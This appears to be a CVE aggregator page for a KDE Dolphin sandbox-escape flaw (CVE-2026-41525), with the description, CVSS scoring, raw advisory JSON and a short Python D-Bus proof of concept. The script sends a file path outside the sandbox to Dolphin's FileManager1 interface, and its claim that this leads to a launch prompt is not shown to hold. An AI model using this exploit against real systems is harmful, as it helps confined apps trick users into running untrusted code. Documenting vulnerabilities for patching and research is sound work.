Security Vulnerability Report
中文
CVE-2026-41525 CVSS 6.5 MEDIUM

CVE-2026-41525

Published: 2026-04-28 08:16:01
Last Modified: 2026-05-19 07:16:30
Source: [email protected]

Description

KDE Dolphin before 25.12.3 allows applications in a Flatpak (or with AppArmor confinement) to open folders outside of the application sandbox without additional scrutiny. Dolphin's implementation of the FileManager1 protocol allows the path given to be any type of file, including scripts or executables. (By default, Dolphin will then prompt the user to determine if they want to launch a script or executable; however, the intended behavior is to block the attempted action, not present a consent prompt.)

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

KDE Dolphin < 25.12.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-41525: Dolphin FileManager1 Sandbox Bypass # This script simulates a malicious Flatpak app calling the D-Bus interface. import dbus def exploit_dolphin_sandbox_escape(target_file): # Connect to the session bus bus = dbus.SessionBus() # The object path and interface for Dolphin's FileManager1 dolphin_object = bus.get_object('org.freedesktop.FileManager1', '/org/freedesktop/FileManager1') file_manager_interface = dbus.Interface(dolphin_object, 'org.freedesktop.FileManager1') # Construct the URI pointing to a file outside the sandbox uri = f"file://{target_file}" try: # Call ShowItems method. This triggers Dolphin to prompt the user. file_manager_interface.ShowItems([uri], "") print(f"[+] Request sent to Dolphin to open: {uri}") print("[+] If user clicks 'Run', sandbox is bypassed.") except dbus.exceptions.DBusException as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Example: Attempting to open a script in the user's home directory exploit_dolphin_sandbox_escape("/home/user/malicious_script.sh")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41525", "sourceIdentifier": "[email protected]", "published": "2026-04-28T08:16:01.477", "lastModified": "2026-05-19T07:16:29.630", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "KDE Dolphin before 25.12.3 allows applications in a Flatpak (or with AppArmor confinement) to open folders outside of the application sandbox without additional scrutiny. Dolphin's implementation of the FileManager1 protocol allows the path given to be any type of file, including scripts or executables. (By default, Dolphin will then prompt the user to determine if they want to launch a script or executable; however, the intended behavior is to block the attempted action, not present a consent prompt.)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-669"}]}], "references": [{"url": "https://github.com/KDE/dolphin/releases/tag/v25.12.3", "source": "[email protected]"}, {"url": "https://invent.kde.org/system/dolphin/", "source": "[email protected]"}, {"url": "https://kde.org/info/security/advisory-20260427-2.txt", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.